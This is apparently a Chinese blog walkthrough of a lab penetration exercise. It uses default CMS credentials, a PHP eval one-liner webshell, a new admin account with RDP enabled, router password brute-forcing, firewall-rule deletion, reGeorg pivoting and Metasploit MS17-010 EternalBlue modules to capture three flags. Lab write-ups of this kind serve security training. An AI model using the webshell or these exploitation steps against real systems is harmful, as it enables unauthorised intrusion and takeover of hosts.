记一次灰常灰常艰难的利用永恒之蓝漏洞实现的内网多节点靶场渗透

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理

资源连接
链接:https://pan.baidu.com/s/14kEm-MDzuhct80NGYwZC-w
提取码:w0cz

在这里插入图片描述

渗透目标及工具:

目标
找到3个flag
工具
菜刀
QuarksPwDump.exe
kali
线索
公网IP:192.168.100.50

在这里插入图片描述

环境搭建:

将下载好的文件解压然后虚拟机打开此文件夹,分别导入两台靶机并开机
在这里插入图片描述

将物理机的VMnet8网络地址改为192.168.100.1在这里插入图片描述
将物理机的VMnet19网络地址改为192.168.200.1
在这里插入图片描述
完成后在浏览器中输入192.168.100.50即可访问YXcms主页,渗透之路由此开始
在这里插入图片描述
在这里插入图片描述

渗透过程:

1、信息搜集

从主页可以看到是dedeCMS的网站模板,所以百度他的后台
在这里插入图片描述
输入后台地址成功找到后台,百度到默认账户密码为admin、admin直接登录就行了
在这里插入图片描述

2、获取webshell

果然登录进来了,然后找到文件上传点
在这里插入图片描述
加入一句话木马<?php @eval($_POST[666]);?>
在这里插入图片描述
使用菜刀连接
在这里插入图片描述

2、第一个flag

在桌面找到第一个flag
在这里插入图片描述
打开终端看到是system权限,不用提权了,但是只有一个ip网段,另外两台肯定隐藏在其他网段了
在这里插入图片描述
先尝试获取管理员密码,具体方法请参照此文章
在这里插入图片描述
结果很遗憾还要付费,呵呵付费是不可能的
在这里插入图片描述

没办法只能添加一个系统账号加到管理员组,然后开启远程桌面服务与端口,具体方法请参照此文章
在这里插入图片描述
然后开通远程桌面服务,具体方法请参照此文章,上传一个ip扫描工具针对常见内网ip进行扫描,发现了一个主机和两个路由

在这里插入图片描述
在这里插入图片描述
发现ip192.168.200.254为主路由,通過弱口令爆破进入路由管理界面
在这里插入图片描述
首先看到了这几个网段
在这里插入图片描述
然后发现DMZ与SERVER的防火墙规则只允许tcp协议通过所以各主机之间ping不通,将此规则删除为后续渗透提供便利
在这里插入图片描述
然后使用reGeorg代理win3服务器,具体方法请参照此文章,这里kali的网段要改成100
在这里插入图片描述

输入proxychains msfconsole然后search ms17-010查询,看到两种exp
在这里插入图片描述

輸入use exploit/windows/smb/ms17_010_eternalblue使用17010漏洞攻击,填好目标ip和攻击者ip即可在这里插入图片描述

3、第二个flag

进入win7的桌面找到第二个flag
在这里插入图片描述

接下来重复win7的操作,输入use exploit/windows/smb/ms17_010_psexec使用17010漏洞攻击,加目标IP网段扫描,找到10.1.1.2,然后再将ip更换一下就行了
在这里插入图片描述

exploit执行,成功拿到ser03shell
在这里插入图片描述

3、第三个flag

进入ser03的管理员桌面中,找到第三个flag
在这里插入图片描述

发布了108 篇原创文章 · 获赞 1147 · 访问量 18万+

猜你喜欢

转载自blog.csdn.net/weixin_45728976/article/details/105136969